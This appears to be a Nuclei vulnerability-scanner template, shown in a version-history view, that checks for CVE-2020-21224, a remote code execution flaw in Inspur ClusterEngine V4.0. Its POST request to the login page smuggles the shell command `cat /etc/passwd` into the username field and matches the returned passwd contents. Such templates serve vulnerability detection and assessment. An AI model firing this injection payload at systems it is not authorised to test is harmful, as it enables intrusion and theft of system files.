nuclei-templates/cves/2020/CVE-2020-21224.yaml

26 lines
534 B
YAML
Raw Normal View History

2021-03-03 13:44:11 +00:00
id: CVE-2020-21224
info:
2021-03-03 20:26:35 +00:00
name: Inspur ClusterEngine V4.0 RCE
2021-03-03 13:44:11 +00:00
author: pikpikcu
severity: critical
reference: https://github.com/NS-Sp4ce/Inspur/tree/master/ClusterEngineV4.0%20Vul
tags: cve,cve2020,clusterengine,rce
requests:
- method: POST
path:
- '{{BaseURL}}/login.php'
body: "op=login&username=;`cat /etc/passwd`&password="
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
part: body
- type: status
status:
2021-03-03 20:26:35 +00:00
- 200